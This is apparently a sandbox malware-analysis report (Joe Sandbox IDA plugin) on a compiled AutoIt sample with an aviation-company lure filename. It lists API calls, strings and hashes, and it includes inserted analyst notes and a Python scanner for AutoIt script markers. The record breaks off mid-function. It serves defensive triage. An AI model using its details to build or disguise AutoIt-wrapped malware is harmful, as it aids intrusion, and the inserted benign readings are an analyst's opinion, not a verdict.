• Instruction ID: 5f548e299a20e85432d15b954f98158a2e76a48fd5996325dd75f14e13446be8
• Opcode Fuzzy Hash: a12015d819c61eba3dfcc2ad2443f4c9263df296cdb3477f965041b215e6e9f1
• Instruction Fuzzy Hash: DCD1E571A00616EBEB62EF65D844BBEB7B4BF05300F10845AE5C59B2C4CF79B850CBA1
APIs
• CharUpperBuffW.USER32(?,?), ref: 01024424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0102446F
Note: the command string is upper-cased with CharUpperBuffW and matched against CHECK, COLLAPSE, EXISTS, EXPAND, GETITEMCOUNT, GETSELECTED, GETTEXT, GETTOTALCOUNT, ISCHECKED, SELECT and UNCHECK, the command set of AutoIt's ControlTreeView(); message 0x1105 is TVM_GETCOUNT, which backs GETTOTALCOUNT. A function that accepts commands from a tree-view control is a GUI helper, not a command-and-control dispatcher.
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
• Instruction ID: 6eb81fafaeff192eb595c75e87c44eaa761bbe4969cde4d81dfb57065fe82c38
• Opcode Fuzzy Hash: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
• Instruction Fuzzy Hash: 97918D70208311DBCB14EF14C851A6EB7E1AF95354F44486CF8D69B3A2CB79ED0ADB81
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0102B8B4
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010291C2), ref: 0102B910
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B949
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0102B98C
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B9C3
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0102B9CF
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0102B9DF
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,010291C2), ref: 0102B9EE
                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0102BA0B
                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0102BA17
                                                                                                                                      • Part of subcall function 00FC2EFD: __wcsicmp_l.LIBCMT ref: 00FC2F86
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                                    • Opcode ID: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                                                                                    • Instruction ID: f4c6298fcac7a0ee133e842943daf9e8f11c819c038c2702579c947b01983f89
                                                                                                                                    • Opcode Fuzzy Hash: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                                                                                    • Instruction Fuzzy Hash: 72610171A00226BEEB24DF68CD41FBE7BB8FB08710F10415AF955D60C1DBB99A80D7A0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0100A3CB
                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0100A418
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A460
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A497
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A4C5
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                                    • Opcode ID: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                                                                                    • Instruction ID: 9435004e647be50d3f50ec2f71fed8ca613d0cb73bdca316e4397df2ad22becb
                                                                                                                                    • Opcode Fuzzy Hash: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                                                                                    • Instruction Fuzzy Hash: CD5158B52083059FD740EF25CC81C6BB7E4EF89758F40886DF89657291DB39AD0ACB52
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FFF8DF
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF8E8
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,01065310,?,00000FFF,?,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FFF90A
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF90D
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF95D
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF96E
                                                                                                                                    • _wprintf.LIBCMT ref: 00FFFA17
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FFFA2E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                                    • Opcode ID: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                                                                                    • Instruction ID: 5bf6d4a4bfdd4942583570344cb57abc2cf1407992f0dc545256fdeb2f723ee0
                                                                                                                                    • Opcode Fuzzy Hash: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                                                                                    • Instruction Fuzzy Hash: 8C4141B280020DAACF14FBE1DD46EFE7778AF19750F500065F505B60A6EA395F09EB61
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01029207,?,?), ref: 0102BA56
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA6D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA78
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA85
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0102BA8E
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA9D
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0102BAA6
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BAAD
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BABE
                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,01032CAC,?), ref: 0102BAD7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0102BAE7
                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0102BB0B
                                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0102BB36
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0102BB5E
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0102BB74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                    • Opcode ID: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                                                                                    • Instruction ID: 36033b594e037670671f26d11816b3aa2419514da74af7cd98395fa28b11baad
                                                                                                                                    • Opcode Fuzzy Hash: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                                                                                    • Instruction Fuzzy Hash: 7C414975600219AFDB319F69DC88EAABBBCFF8AB51F208058F985D7254C7759901CB20
                                                                                                                                    APIs
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0100DA10
                                                                                                                                    • _wcscat.LIBCMT ref: 0100DA28
                                                                                                                                    • _wcscat.LIBCMT ref: 0100DA3A
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0100DA4F
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DA63
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0100DA7B
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0100DA95
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DAA7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                                    • Opcode ID: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                                                                                    • Instruction ID: fe8c4ef83098e063d4bd0160d329f1010063ef6e6c27cefd1c17a0c3facb2501
                                                                                                                                    • Opcode Fuzzy Hash: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                                                                                    • Instruction Fuzzy Hash: C881B4715083419FEB65DFE8C840A6EB7E5BF89310F18486EF9C9C7291EA34D944CB62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0102C1FC
                                                                                                                                    • GetFocus.USER32 ref: 0102C20C
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0102C217
                                                                                                                                    • _memset.LIBCMT ref: 0102C342
                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0102C36D
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0102C38D
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0102C3A0
                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0102C3D4
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0102C41C
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0102C454
                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0102C489
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                    • Opcode ID: 4ad878c764b697af50318f5c5ab6fd639a2dc44ca80a78384a79aee1a78ed5b8
                                                                                                                                    • Instruction ID: 0d61fff6ad76c9139b661fa4f894d31c0b43b5ffd0f828d7fb1c9d76b8b1b5c5
                                                                                                                                    • Opcode Fuzzy Hash: 4ad878c764b697af50318f5c5ab6fd639a2dc44ca80a78384a79aee1a78ed5b8
                                                                                                                                    • Instruction Fuzzy Hash: EB81A0702083219FE721CF18CA84A6FBBE8FB89354F10495EFAC597251CB35D905CB52
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0101738F
                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0101739B
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 010173A7
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 010173B4
                                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01017408
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01017444
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01017468
                                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 01017470
                                                                                                                                    • DeleteObject.GDI32(?), ref: 01017479
                                                                                                                                    • DeleteDC.GDI32(00000006), ref: 01017480
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0101748B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                    • Opcode ID: 4fa87db84af6e118584dd19f72ae57ff1525306a2504115b22cbe954183b7b91
                                                                                                                                    • Instruction ID: 99f1ccfde12f5bb7b14fe2fbe3a002fc6d4749c569d77a8adc0371bc1455b305
                                                                                                                                    • Opcode Fuzzy Hash: 4fa87db84af6e118584dd19f72ae57ff1525306a2504115b22cbe954183b7b91
                                                                                                                                    • Instruction Fuzzy Hash: 46514C7590030AEFDB25CFA8C885EAEBBF9EF48350F14851DF99A97214C739A940CB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA6B0C,?,00008000), ref: 00FC0973
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA6CFA
                                                                                                                                      • Part of subcall function 00FA586D: _wcscpy.LIBCMT ref: 00FA58A5
                                                                                                                                      • Part of subcall function 00FC363D: _iswctype.LIBCMT ref: 00FC3645
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                                    • Opcode ID: 464ea72739d21d050d9e54498fcffc8e3e9c29c08f26c16fbdc3481e83595b4c
                                                                                                                                    • Instruction ID: 77bfcd2909d3f3373090ba36955edf52ee3717405e4775e2c52d2d6449b24502
                                                                                                                                    • Opcode Fuzzy Hash: 464ea72739d21d050d9e54498fcffc8e3e9c29c08f26c16fbdc3481e83595b4c
                                                                                                                                    • Instruction Fuzzy Hash: 4D02CFB15083419FC724EF20C881AAFBBE6EF96354F08481EF4D5972A1DB34D949EB42
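As an added triage check, not part of the Joe Sandbox report: the strings this function references, ">>>AUTOIT SCRIPT<<<", "AU3!" and "EA06", are the tags a compiled AutoIt3 executable carries in front of its embedded script ("AU3!" and "EA06" occur joined as "AU3!EA06"). The scanner below locates those tags in a file image in both 8-bit and UTF-16LE form, which is the quickest way to confirm a "compiled AutoIt script" verdict by hand. The reading of the strings as script-resource tags is mine, and the buffer the scanner runs on is a constructed stand-in, not the analysed sample.

```python
from __future__ import annotations

# Markers taken from the strings this function references: "AU3!" and "EA06" are the two
# halves of the "AU3!EA06" tag that compiled AutoIt3 executables place in front of the
# embedded script, and ">>>AUTOIT SCRIPT<<<" is the older script-resource tag. The runtime
# works with wide strings (_wcscpy, _iswctype in the same function), so both tags are also
# searched in their UTF-16LE form.
MARKERS = (b"AU3!EA06", b">>>AUTOIT SCRIPT<<<")


def _needles(marker: bytes):
    """Yield (encoding name, byte pattern) for the ASCII and UTF-16LE forms of a marker."""
    yield "ascii", marker
    yield "utf-16le", marker.decode("ascii").encode("utf-16-le")


def scan_for_autoit_markers(blob: bytes) -> list:
    """Return (offset, marker, encoding) for every occurrence, sorted by offset."""
    hits = []
    for marker in MARKERS:
        for enc, needle in _needles(marker):
            start = 0
            while (idx := blob.find(needle, start)) != -1:
                hits.append((idx, marker.decode("ascii"), enc))
                start = idx + 1
    return sorted(hits)


def looks_like_compiled_autoit(blob: bytes) -> bool:
    """True when the AU3!EA06 tag is present in either encoding."""
    return any(m == "AU3!EA06" for _, m, _ in scan_for_autoit_markers(blob))


# Constructed test buffer (not the analysed sample): a fake MZ stub with both tags embedded.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"AU3!EA06" + b"\x00" * 16
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\xff" * 8
)

if __name__ == "__main__":
    # For a real file: blob = open(path, "rb").read()
    for off, marker, enc in scan_for_autoit_markers(SAMPLE):
        print(f"0x{off:06x}  {marker:<20} {enc}")
    print("compiled AutoIt:", looks_like_compiled_autoit(SAMPLE))
```

A hit only identifies the AutoIt wrapper, never the payload: the tag sits in every compiled AutoIt3 binary, benign or not, so the next step is extracting and decompiling the script rather than reading anything into the marker itself.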
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002D50
                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01002DDD
                                                                                                                                    • GetMenuItemCount.USER32(01065890), ref: 01002E66
                                                                                                                                    • DeleteMenu.USER32(01065890,00000005,00000000,000000F5,?,?), ref: 01002EF6
                                                                                                                                    • DeleteMenu.USER32(01065890,00000004,00000000), ref: 01002EFE
                                                                                                                                    • DeleteMenu.USER32(01065890,00000006,00000000), ref: 01002F06
                                                                                                                                    • DeleteMenu.USER32(01065890,00000003,00000000), ref: 01002F0E
                                                                                                                                    • GetMenuItemCount.USER32(01065890), ref: 01002F16
                                                                                                                                    • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 01002F4C
                                                                                                                                    • GetCursorPos.USER32(?), ref: 01002F56
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 01002F5F
                                                                                                                                    • TrackPopupMenuEx.USER32(01065890,00000000,?,00000000,00000000,00000000), ref: 01002F72
                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01002F7E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3993528054-0
                                                                                                                                    • Opcode ID: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                                                                                    • Instruction ID: 1751d5de09600351846814ec7b5265791dc5034c603d802415cfe5c1d3a38ad5
                                                                                                                                    • Opcode Fuzzy Hash: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                                                                                    • Instruction Fuzzy Hash: 7371D470640256BAFB329F58DC8DFAABFA8FF04754F10025AF695AA1D0C7B55C20C790
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • _memset.LIBCMT ref: 00FF786B
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FF78A0
